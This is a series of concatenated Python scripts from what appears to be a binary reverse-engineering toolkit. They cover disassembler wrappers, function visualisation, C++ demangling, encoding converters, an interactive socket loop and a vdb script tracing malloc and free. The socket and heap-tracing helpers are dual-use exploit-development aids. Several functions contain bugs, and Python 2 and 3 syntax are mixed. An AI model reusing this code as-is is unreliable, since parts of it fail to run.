        self.ceiling = 100      # FIXME: try having ceiling be the number of nodes
        self.smallest = 0xfffffffffffffffff
        self.minimum_safe_distance = 1

    def addNode(self, node):
        self.nodes[node.ident] = node
        if node.ident < self.smallest:
            self.smallest = node.ident

        self.adjust()

    def addEdge(self, node1, node2, cls=Edge):
        edge = cls((node1, node2))
        if self.edges.get(edge.nodes) != None:
            raise(Exception("FAIL!  this node exists: %s" % repr(edge)))

        print >>sys.stderr,("adding new edge: %s" % repr(edge))

        self.edges[edge.nodes] = edge
        self.adjust()

    def adjust(self):
        go = True
        print >>sys.stderr,("adjusting system.")
        pendulum = .99
        while go:
            #adjustment = vector(0,0,0)
            adjustment = 0

            for node in self.nodes.values():
                diff = node.applyForces(pendulum)
                adjustment += abs(diff)

                print >>sys.stderr, node


            #x,y,z = adjustment
            #value = x+y+z
            value = adjustment
            if abs(value) <= STABILITY_CONST:
                go = False
            else:
                print >>sys.stderr,("adjusting system.  adjustment = %s" % repr(value))
                #sys.stdin.readline()
            pendulum *= .99

class VivNode(Node):
    def applyForces(self, coeff=1):
        s = self.system
        want = vector(0,0,0)

        # all the other nodes
        for n in s.nodes.values():
            if n == self:
                continue
            diff = (n.pos - self.pos)
            if not abs(diff):
                diff = vector(.0001, 0, .0001)
            thisforce = NODE_FORCE_COEFF * diff / abs(diff)
            print >>sys.stderr,("NODE: %x to %x:  force=%s  diff=%s  abs()=%s" % 
                    (self.ident, n.ident, thisforce, diff, abs(diff)))
            want += (thisforce * coeff)



        # all my edges
        for e in self.edges:        # FIXME: this has to be broken...
            if (e.nodes[0] == self):
                diff = -e.axis
            else:
                diff = e.axis
            if not abs(diff):
                diff = vector(.0001, 0, .0001)
            thisforce = - ( EDGE_SPRING_COEFF * diff * (log( abs(diff) ) + 1) )
            print >>sys.stderr,("EDGE: %x to %x:  force=%s" % (self.ident, n.ident, thisforce))
            want += (thisforce * coeff)


        # gravity
        want.y -= GRAVITY_COEFF * (self.ident/s.smallest)        # FIXME: perhaps we don't need to multiply by ident?

        # the one glued to the ceiling
        if s.smallest == self.ident:
            want.y = s.ceiling - self.y
            want.x = -self.x
            want.z = -self.z



        # update self...
        self.pos += want

        # the floor
        if self.y <= s.minimum_safe_distance:
            self.y = s.minimum_safe_distance
            #want.y = 100        # FIXME: do we really want this to invalidate the graph?
        # ceiling
        if self.y > s.ceiling:
            self.y = s.ceiling
        

        self.updateEdges()

        return want

        


def test(system):
    for x in xrange(0x8048000, 0x8058000, 0x1000):
        n = VivNode(system, x)
        system.addNode(n)
        if len(system.nodes) > 1:
            system.addEdge(n, system.nodes.values()[-2])
        #
        if ((x>>8) % 4 == 3):
            system.addEdge(n, system.nodes.values()[-3])




import sys
from sys import *
from atlasutils.props import *
from atlasutils.smartprint import *

try:
    from pydasm import *
except:
    print(("pydasm not found, continuing anyway"), file=sys.stderr)

try:
    from disassemble import *
except:
    print(("libdisassemble not found, continuing anyway"), file=sys.stderr)

try:
    import envi.archs.i386 as e_i386
    import envi.archs.i386.disasm as e_i386d
except:
    print(("envi not found, continuing anyway"), file=sys.stderr)


from Elf import *


# pydasm stuff.
def g(STR):
    return get_instruction(STR,MODE_32)

def gs(STR):
    return get_instruction_string(g(STR), FORMAT_ATT, 0)

def disassPD(buffer, base = 0, mode = 32):
    """ Returns a list of tuples (address, instructionobject)
    """ 
    offset = 0
    opcodes = []
    if mode == 32:
        pydasm_mode = MODE_32
    elif mode == 16:
        pydasm_mode = MODE_16
    else:
        pydasm_mode = MODE_64

    while offset < len(buffer):
        i = get_instruction(buffer[offset:], pydasm_mode)
        #opcodes.append("%x: %s"%((base+offset), get_instruction_string(i, FORMAT_ATT, 0)))
        opcodes.append(((base+offset), i))
        if not i:
            return opcodes
        offset += i.length
    return opcodes

def disassPDdict(buffer, base = 0, mode = 32):
    offset = 0
    ops = props()
    if mode == 32:
        pydasm_mode = MODE_32
    elif mode == 16:
        pydasm_mode = MODE_16
    else:
        pydasm_mode = MODE_64

    while offset < len(buffer):
        i = get_instruction(buffer[offset:], pydasm_mode)
        if not i:
            return ops
        if (offset % 100 < 5): stderr.write(".")
        #ops.setdefault("%x"%((base+offset)),get_instruction_string(i, FORMAT_ATT, 0))
        ops["%x"%(base+offset)] = i
        offset += i.length
    return ops


def disassLD(buffer, offset=0, base = 0, mode = 32):
    """ Returns a list of tuples (address, instructionobject)
    """ 
    opcodes = []
    last = None
    prev = None
    o = None
    while offset < len(buffer):
        prev = last
        last = o
        o = Opcode(buffer, offset, mode)
        #opcodes.append("%x: %s\t %s"%((base+offset),"",o.printOpcode("AT&T",30)))
        opcodes.append(((base+offset), o))
        print(repr(o))
        if o == None:
            return opcodes
        offset += o.getSize()
    return opcodes

def disassLDdict(buffer, base = 0, mode = 32):
    opcodes = props()
    offset = 0
    last = None
    prev = None
    o = None
    while offset < len(buffer):
        prev = last
        last = o
        o = Opcode(buffer, offset, mode)
        if not o:
            return opcodes
        if (offset % 100 < 5): stderr.write(".")
        #opcodes.setdefault("%x"%((base+offset)),o.printOpcode("AT&T",30))
        opcodes["%x"%(base+offset)] = o
        if o.getSize() > 0:
            offset += o.getSize()
        else:
            offset += 1
    return ops
    
def disassENVI(buffer, base = 0, mode = 32):
    opcodes = props()
    offset = 0
    last = None
    prev = None
    o = None
    while offset < len(buffer):
        prev = last
        last = o
        o = Opcode(buffer, offset, mode)
        if not o:
            return opcodes
        if (offset % 100 < 5): stderr.write(".")
        #opcodes.setdefault("%x"%((base+offset)),o.printOpcode("AT&T",30))
        opcodes["%x"%(base+offset)] = o
        if o.getSize() > 0:
            offset += o.getSize()
        else:
            offset += 1
    return ops


testbuffers = []
testbuffers.append( "\x8A\x4D\x0C")                   #       mov           0xc(%ebp), %cl
testbuffers.append( "\x00\x00")                       #       
testbuffers.append( "\xff\x25\xfc\xfc\x37\x08")       #       jmp    *0x837fcfc
testbuffers.append( "\xe9\xd0\xf3\xff\xff")           #       jmp    804c5b4
testbuffers.append( "\x68\x20\x06\x00\x00")           #       push   $0x620
testbuffers.append( "\x89\x44\x24\x14")               #       mov    %eax,0x14(%esp)
testbuffers.append( "\x8b\x42\x0c")                   #       mov    0xc(%edx),%eax
testbuffers.append( "\xe8\xf8\x03\x00\x00")           #       call   809ee70
testbuffers.append( "\xb8\x30\xc8\x2e\x08")           #       mov    $0x82ec830,%eax
testbuffers.append( "\x8b\x5d\xfc")                   #       mov    0xfffffffc(%ebp),%ebx
testbuffers.append( "\x89\x5d\xfc")                   #       mov    %ebx,0xfffffffc(%ebp)
testbuffers.append( "\x26\x26\x26\x26\x26\x26")       #       add    %ch,%es:(%eax)    (per PyDasm)
testbuffers.append( "\x69\x69\x69\x69\x69\x69")       #       imul $0x69696969,0x69(%ecx),%ebp


def getOperandValue(vtrace, op, operand):
    dereference = False
    add = ""
    numaddr = 0
    source = operand
    if isinstance(source, Expression):
        if source.disp:
            numaddr += source.disp.value
        if source.base:
            source = source.base
        dereference = True
        #print(>>outfile,("DEBUG-expr: %x"%numaddr))
    if isinstance(source, SIB):
        if source.index:
            numaddr += (souce.index * source.scale)
        if source.base:
            source = source.base
        #print(>>outfile,("DEBUG-sib: %x"%numaddr))
    if isinstance(source, Register):
        reg = source.name
        mask = 0xffffffff       # 32 bit only
        if reg[0] != 'e' and reg[1] in ['l','h','x']:       # TOTALLY libdisassemble-centric, as it assumes lowercase letters
            if reg[1] == 'x':
                mask = 0xffff
            elif reg[1] == 'l':
                mask = 0xff
            elif reg[1] == 'h':
                mask = 0xff00
            reg = 'e%cx'%reg[0]                             # vtrace doesn't like al/ah and possibly ax
        numaddr += (vtrace.getRegisterByName(reg) & mask)
        #print(>>outfile,("DEBUG-reg: %x"%numaddr))
    elif isinstance(source, Address):
        numaddr += source.value
        if source.relative:
            numaddr += eip + op.off
        #print(>>outfile,("DEBUG-addr: %x"%numaddr))
    if dereference:
        try:
            numaddr = struct.unpack("L",vtrace.readMemory(numaddr, 4))[0]
            #print(>>outfile,("DEBUG-deref: %x"%numaddr))
        except:
            #print(>>outfile,("DEBUG-deref-except: %x"%numaddr))
            #print(("DEBUG-deref-except: %x"%numaddr), file=sys.stderr)
            pass
            
    return numaddr


def disass(bytes, offset=0, VMA = 0, mode = 32, printbytes = True):
    """  This is just a simple interactive "byte" disassembler for real byte decoding, etc..."""
    for addr,opcode in disassLD(bytes, offset, VMA, mode):
        if printbytes:
            print("%x: %40s\t%s"%(addr,hexText(opcode.data[opcode.dataoffset:opcode.off]), opcode.printOpcode("AT&T", addr)))
        else:
            print("%x: %s"%(addr,opcode.printOpcode("AT&T", addr)))



import time
import vivisect

from visual import *

if locals().get('funcballs') == None:
    funcballs = None


def vizFuncs(vw, FACTOR = 10, diam=0.5, l=None,w=None,h=None):
    global floor, funcballs

    newobjects = False
    if funcballs == None:
        funcballs = {}
        newobjects = True

    funcvas = vw.getFunctions()
    funcvas.sort()
    count = len(funcvas)                    ; print "numFuncs: %d" % count

    height = sqrt(count) + 1                ; print "height:   %d" % height
    width = int(sqrt(height))               ; print "width:    %d" % width
    halfwidth = .5*width

    layersize = height                      ; print "layersz:  %d" % layersize


    if floor != None:
        floor = box (pos=(0,0,0), length=width*FACTOR, height=0.5, width=width*FACTOR, color=color.blue)

    for fidx in xrange(len(funcvas)):
        funcva = funcvas[fidx]
        y = (height - int(fidx / layersize)) * FACTOR   #FIXME: should be int() but we're going to play..
        l = (fidx % layersize)
        x = (int(l / width) - (halfwidth)) * FACTOR
        z = ((l % width) - halfwidth) * FACTOR

        if newobjects:
            fb = (sphere(pos=(x,y,z), length=diam, height=diam, width=diam, color=color.red))
            fb.label = label("fva: 0x%.8x" % funcva)
            funcballs[funcva] = fb

        else:
            fb = funcballs[funcva]
            fb.pos = (x,y,z)
            if l != None:
                fb.length = l
            if w != None:
                fb.width = w
            if h != None:
                fb.height = h

    return funcballs

def colorize():
    FACTOR = 1
    global floor, funcballs
    count = len(funcballs)                  ; print "numFuncs: %d" % count

    height = sqrt(count) + 1                ; print "height:   %d" % height
    width = int(sqrt(height))               ; print "width:    %d" % width
    halfwidth = .5*width

    layersize = width ** 2                  ; print "layersz:  %d" % layersize

    items = funcballs.items()
    items.sort()
    for fidx in xrange(len(items)):
        funcva, funcb = items[fidx]
        y = (height - (fidx / layersize)) * FACTOR   #FIXME: should be int() but we're going to play..
        l = (fidx % layersize)
        x = (int(l / width) - (halfwidth)) * FACTOR
        z = ((l % width) - halfwidth) * FACTOR

        cy = (1.0*abs(y/height))
        cx = (1.0*abs(x/halfwidth))
        cz = (1.0*abs(z/halfwidth))

        funcballs[funcva].color = vector(cx,cy,cz)

def cycle(balls, rad=4, color=color.green):
    global funcballs

    for fb in balls:
        oclr = fb.color
        orad = fb.radius
        fb.color = color
        fb.radius = rad
        #
        rate(300)
        fb.color = oclr
        fb.radius = orad


def mouseplay():
    while True:
        rate(100)
        if scene.mouse.events:
            event = scene.mouse.getevent()
            print repr(vars(event))
            mouse = scene.mouse.getclick()
            obj = mouse.pick
            #if mouse.
            if obj != None and obj.radius != None:
                print "radius = %f" % obj.radius
                obj.radius = (3,5,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1) [int(obj.radius)]
            #else:
            #    obj.radius = 2

def demo():
    floor = box (pos=(0,0,0), length=400, height=0.5, width=400, color=color.blue)
    ball = sphere (pos=(0,400,0), radius=1, color=color.red)
    ball.velocity = vector(0,-1,0)
    dt = 0.01

    while 1:
        rate (100)
        ball.pos = ball.pos + ball.velocity*dt
        if ball.y < ball.radius:
            ball.velocity.y = abs(ball.velocity.y)
        else:
            ball.velocity.y = ball.velocity.y - 9.8*dt





if __name__ == "__main__":
    demo()

import vivisect
if locals().get('vw') == None:
    vw = vivisect.VivWorkspace()
    vw.loadWorkspace('libxul.so.viv')



#!/usr/bin/python
import sys

def ascii2hex(ascii):
	output = ""
	for x in range(len(ascii)):
		output += "%.02x"%ord(ascii[x])
	return output


def hex2ascii(inp):
    outputline = ""
    for i in range(len(inp)/2):
      outputline += chr(int(inp[(i*2):(i*2)+2],16))
    return outputline

def ascii2decimel(ascii):
	output = ""
	for x in range(len(ascii)):
		output += "%.02d"%ord(ascii[x])
	return output


def decimel2ascii(inp):
    outputline = ""
    for i in range(len(inp)/2):
      outputline += chr(int(inp[(i*2):(i*2)+2]))
    return outputline



import sys,select

def interactive(sock):
    while True:
        x,y,z = select.select([sock,sys.stdin],[],[],.1)
        if sock in x:
            sys.stderr.write('.')
            input = sock.recv(1000)
            if len(input) == 0:
                break
            else:
                sys.stdout.write(input)
        if sys.stdin in x:
            sock.sendall(sys.stdin.read(1))





import os
import re
import sys
import string
import cxxfilt
import inspect
import subprocess
import ctypes.util as cutil
from ctypes import *

from vivisect import L_LTYPE, LOC_IMPORT

lib = cutil.find_library("stdc++")

def convertGCC_old(mangled):
    print "converting:  ", mangled
    libstdc = CDLL(lib)
    mbuf = c_buffer(mangled, 1000)
    status = c_int(0)
    nptr = libstdc.__cxa_demangle(mbuf, None, None, byref(status))

    if status.value != 0:
        print "Error: status: %s" % status

    name = c_char_p(nptr)
    if name.value != None:
        return name.value


vccpath = None
if globals().get('argv'):
    curdir = os.path.dirname(os.path.abspath(argv[0]))
else:
    curdir = os.path.dirname(os.path.abspath(sys.argv[0]))
print curdir


VCFILT = os.path.join(curdir, 'vc++filt.exe')
def convertVCPP(mangled):
    if not ("@" in mangled or "?" in mangled): return
    p = subprocess.Popen(VCFILT, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    p.stdin.write("%s\n" % mangled)
    p.stdin.close()
    newname = p.stdout.read().strip()
    print newname
    if newname != mangled:
        return newname
''' stolen from:    http://stackoverflow.com/questions/6526500/c-name-mangling-library-for-python

def demangle(names):
    args = ['c++filt']
    args.extend(names)
    pipe = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    stdout, _ = pipe.communicate()
    demangled = stdout.split("\n")

    # Each line ends with a newline, so the final entry of the split output
    # will always be ''.
    assert len(demangled) == len(names)+1
    return demangled[:-1]

print demangle(['_ZNSt15basic_stringbufIcSt11char_traitsIcESaIcEE17_M_stringbuf_initESt13_Ios_Openmode',
    '_ZNSt15basic_stringbufIcSt11char_traitsIcESaIcEE6setbufEPci'])
'''

def demangle(va, vaname, filefmt, files=[]):
    if not (vaname.startswith('_Z') or '._Z' in vaname):
        return None

    prefix = ''
    suffix = ''
    modname = ''
    args = None
    idx_ = vaname.rfind('_')    # lose the _08048999 address suffix
    if re.match('_[0-9a-f]{1,16}$', vaname[idx_:]) == None:
        workname = vaname
        suffix = '_%.8x' % va
    else:
        workname = vaname
        while re.match('_[0-9a-f]{1,16}$', workname[idx_:]) != None:
            suffix = vaname[idx_:] + suffix
            workname = vaname[:idx_]
            #print workname, suffix
            idx_ = workname.rfind('_')    # lose the _08048999 address suffix


    for vwnm in files:
        if vwnm.find('\\') > -1:
            vwnm = vwnm.split('\\')[-1]
        if vwnm.find('/') > -1:
            vwnm = vwnm.split('/')[-1]

        #print 'checking: ', vwnm
        stub = vwnm + "."
        if workname.startswith(stub):
            #print "w/stub:  ", workname
            workname = workname[len(stub):]
            prefix = stub + '.'
            break
        elif workname.startswith('*.'):
            #print "w/*.:  ", workname
            workname = workname[2:]
            prefix = "*."
            break

    # split between GCC and VC++
    newname = None
    try:
        if filefmt == 'pe':
            newname = convertVCPP(workname)

        if filefmt == "elf":
            # take care of the "@@GLIBCXX_3.4" and "@@CXXABI*" nonsense
            idxAT = workname.rfind('@@')
            if idxAT > -1 and re.match('@@[A-Z_0-9]', workname[idxAT:]):
                #print "slicing suffix at %d" % idxAT
                suffix += workname[idxAT:]
                workname = workname[:idxAT]
                
            parts = workname.rsplit('.', 1)
            if len(parts) > 1:
                modname, workname = parts

            #newname = convertGCC(workname)
            newname = modname + '.' + cxxfilt.demangle(workname)
            #print "%r -> %r" % (workname, newname)

    except Exception, e:
        print "error demangling (%r): %r" % (workname, e)
    finally:
        return prefix, newname, suffix




def analyze(vw, vwnm=None, normalize=False):
    if lib == None:
        return

    if vwnm == None:
        vwnm = vw.metadata['StorageName'].strip('.viv').replace('-', '_')

    importdict = {}
    for imp in vw.getImports():
        basename = imp[3].split('.')[0]
        importdict[basename] = True

    files = importdict.keys()
    files.append(vwnm)

    filefmt = vw.getMeta('Format')

    for va, vaname in vw.name_by_va.items():

        nametup = demangle(va, vaname, filefmt, files)

        if nametup == None:
            continue

        prefix, newname, suffix = nametup
        if newname == None:
            continue

        # if updates were made, make them so...
        # parse out the () args
        fname = newname
        bidx = newname.find('(')
        if bidx != -1:
            eidx = newname.find(')', bidx)
            if eidx != -1:
                args = newname[bidx+1:eidx]
                fname = newname[:bidx] + newname[eidx+1:]

        fname = prefix + normFuncName(fname + suffix)
        vw.vprint("=== updating %s -> %s" % (vaname, fname))
        try:
            vw.makeName(va, str(fname))
            vw.setComment(va, newname)
            if args != None:
                print "FIXME: update Function Args/Prototype"

            loc = vw.getLocation(va)
            if loc != None and loc[L_LTYPE] == LOC_IMPORT:
                print "WTF is this?  LOC_IMPORT... but handler is f'd"
                vw.addLocation(*loc[:3], tinfo=fname)

        except:
            sys.excepthook(*sys.exc_info())


    # update import/export tables:
    #for imp in vw.getImports():


    vw.vprint("DONE")


def normFuncName(funcname):
    out = []
    normname = os.path.basename(funcname)

    ok = string.letters + string.digits + '_'# + ':'# + '~'
    cok = ("%$#*<>~")

    lastcok = False
    chars = list(normname)
    for i in xrange(len(chars)):
        if chars[i] not in ok:
            if chars[i] in cok:
                x = "%.2X" % ord(chars[i])
                out.append(x)
                if not lastcok:
                    # prepend on front
                    out.insert(i, '_')

                lastcok = True

            else:
                out.append('_')
                lastcok = False

        else:
            if lastcok:
                # if last was a 'cok' and this is just ok...
                out.append('_')
            out.append(chars[i])

            lastcok = False

    normname = ''.join(out)
    #if normname[0].isdigit():
        #normname = '_' + normname

    return normname

def vivDemangleOne(vw):
    try:
        name = cxxfilt.demangle(name)
    except Exception, e:
        vw.vprint('Error demangling %r: %r' % (name, e))
        return

    vw.vprint('Name: %r' % name)

if 'vw' in globals().keys():
    analyze(vw)

elif __name__ == '__main__':
    import vivisect
    vw = vivisect.VivWorkspace()
    vw.loadWorkspace(sys.argv[1])
    analyze(vw)
    vw.saveWorkspace()




# this is a vdb script and expects to have a trace object, etc...


bpid = trace.addBreakByExpr("libc.malloc", True)
trace.setBreakpointCode(bpid, "trace.setMeta('mallocstart', (poi(esp),poi(esp+4))); trace.runAgain()")
#        print 'MALLOC: ',hex(poi(esp+4)); trace.runAgain()")

bpid = trace.addBreakByExpr("libc.malloc+0xad", True)
trace.setBreakpointCode(bpid, "blah=trace.getMeta('mallocstart'); print( '%8x:  MALLOC(0x%x) -> %x' % (blah[0], blah[1], eax)) ;trace.runAgain()")

bpid = trace.addBreakByExpr("libc.free", True)
trace.setBreakpointCode(bpid, "print '%8x:  free(0x%x)   (size:%x)' % (poi(esp), poi(esp+4), poi(poi(esp+4)-4)&0xfffffffe) ; trace.runAgain()")




#!/usr/bin/python

# another toy rot toy for use with any char-replacement cipher

import sys

myROT = 13

if (len(sys.argv) > 1 and sys.argv[0] == '-r'):
  snothing = sys.argv.pop(0)
  myROT = sys.argv.pop(0)


a = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
#   Reversed Alphbet
#b = "zyxwvutsrqponmlkjihgfedcba"

#ROT13
b = "nopqrstuvwxyzabcdefghijklmNOPQRSTUBWXYZABCDEFGHIJKLM"

# Gil Bates 
#b = "ubcdefghijnlmkopqrstavwxyz"
#b = "abcedfgkijhlmnopqrsutvwxyz"

def crypto(text):
	output = ""
	for i in range(0,len(text)):
		index = a.find(text[i])
		if index > -1:
			output += b[index]
		else:
			output += text[i]
	return output
if len(sys.argv) > 1:
	ciphertext = sys.argv[1]
else:
	ciphertext = sys.stdin.read()

print(crypto(ciphertext))




#!/usr/bin/python
import sys

def ascii2octal(ascii):
	output = ""
	for x in range(len(ascii)):
		output += "%.03o"%ord(ascii[x])
	return output


def octal2ascii(inp):
    outputline = ""
    for i in range(len(inp)/3):
      outputline += chr(int(inp[(i*3):(i*3)+3],8))
    return outputline
